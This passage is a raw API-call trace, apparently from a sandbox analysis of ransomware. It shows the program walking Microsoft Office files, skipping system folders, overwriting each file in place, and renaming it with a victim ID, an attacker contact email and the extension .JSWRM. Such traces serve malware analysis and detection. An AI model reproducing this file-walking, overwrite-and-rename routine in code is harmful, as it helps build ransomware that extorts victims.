Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.projectmui.msi.16.en-us.xml", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.projectmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 39 [0101.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0101.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0101.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.projectmui.msi.16.en-us.xml", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0101.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.projectmui.msi.16.en-us.xml", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.projectmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 39 [0101.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0101.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0101.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0101.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0101.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.projectmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.projectmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.973] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=32926) returned 1 [0101.973] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8090) returned 0x24c1d0 [0101.973] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x8090, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x8090, lpOverlapped=0x0) returned 1 [0101.981] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.981] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x8090, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x8090, lpOverlapped=0x0) returned 1 [0101.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0101.981] CloseHandle (hObject=0x45c) returned 1 [0101.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0101.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0101.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0101.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0101.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0101.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0101.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.982] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.projectmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.projectmui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.projectmui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.projectmui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0101.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0101.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0101.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.983] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd375d6d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd375d6d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd397382c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x63ae, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.Proof.Culture.msi.16.en-us.xml", cAlternateFileName="C2B3EB~1.XML")) returned 1 [0101.983] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2=".") returned 1 [0101.983] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="..") returned 1 [0101.983] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="...") returned 1 [0101.983] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.983] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.983] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.983] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.983] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.983] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.983] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0101.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Proof.Culture.msi.16.en-us.xml", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0101.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Proof.Culture.msi.16.en-us.xml", cchWideChar=42, lpMultiByteStr=0x22d260, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 42 [0101.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0101.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0101.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Proof.Culture.msi.16.en-us.xml", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0101.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Proof.Culture.msi.16.en-us.xml", cchWideChar=42, lpMultiByteStr=0x22d0a0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 42 [0101.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0101.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0101.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0101.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0101.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proof.culture.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.992] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=25518) returned 1 [0101.992] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x63a0) returned 0x24c1d0 [0101.992] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x63a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x63a0, lpOverlapped=0x0) returned 1 [0102.072] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.072] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x63a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x63a0, lpOverlapped=0x0) returned 1 [0102.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.072] CloseHandle (hObject=0x45c) returned 1 [0102.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0102.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0102.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0102.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0102.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0102.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0102.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.073] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proof.culture.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Proof.Culture.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proof.culture.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0102.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0102.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0102.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.074] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd36eafd9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd36eafd9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd37a9bb2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5fee, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.Proof.Culture.msi.16.es-es.xml", cAlternateFileName="C23127~1.XML")) returned 1 [0102.074] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2=".") returned 1 [0102.074] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="..") returned 1 [0102.074] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="...") returned 1 [0102.074] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="windows") returned -1 [0102.074] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="recovery") returned -1 [0102.074] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="perflogs") returned -1 [0102.074] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="documents and settings") returned -1 [0102.074] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="$RECYCLE.BIN") returned 1 [0102.074] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="system volume information") returned -1 [0102.074] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="msocache") returned -1 [0102.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0102.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Proof.Culture.msi.16.es-es.xml", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0102.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Proof.Culture.msi.16.es-es.xml", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpUsedDefaultChar=0x0) returned 42 [0102.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0102.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0102.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Proof.Culture.msi.16.es-es.xml", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0102.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Proof.Culture.msi.16.es-es.xml", cchWideChar=42, lpMultiByteStr=0x22d260, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpUsedDefaultChar=0x0) returned 42 [0102.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0102.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0102.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0102.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0102.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proof.culture.msi.16.es-es.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.076] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24558) returned 1 [0102.076] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5fe0) returned 0x24c1d0 [0102.076] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5fe0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5fe0, lpOverlapped=0x0) returned 1 [0102.080] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.080] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5fe0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5fe0, lpOverlapped=0x0) returned 1 [0102.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.081] CloseHandle (hObject=0x45c) returned 1 [0102.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0102.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0102.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0102.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0102.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0102.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0102.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.081] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proof.culture.msi.16.es-es.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Proof.Culture.msi.16.es-es.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proof.culture.msi.16.es-es.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0102.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0102.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0102.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.082] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd38424c0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd38424c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd3999a72, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5fee, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", cAlternateFileName="C2BAB3~1.XML")) returned 1 [0102.082] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2=".") returned 1 [0102.082] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="..") returned 1 [0102.082] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="...") returned 1 [0102.082] lstrcmpiW 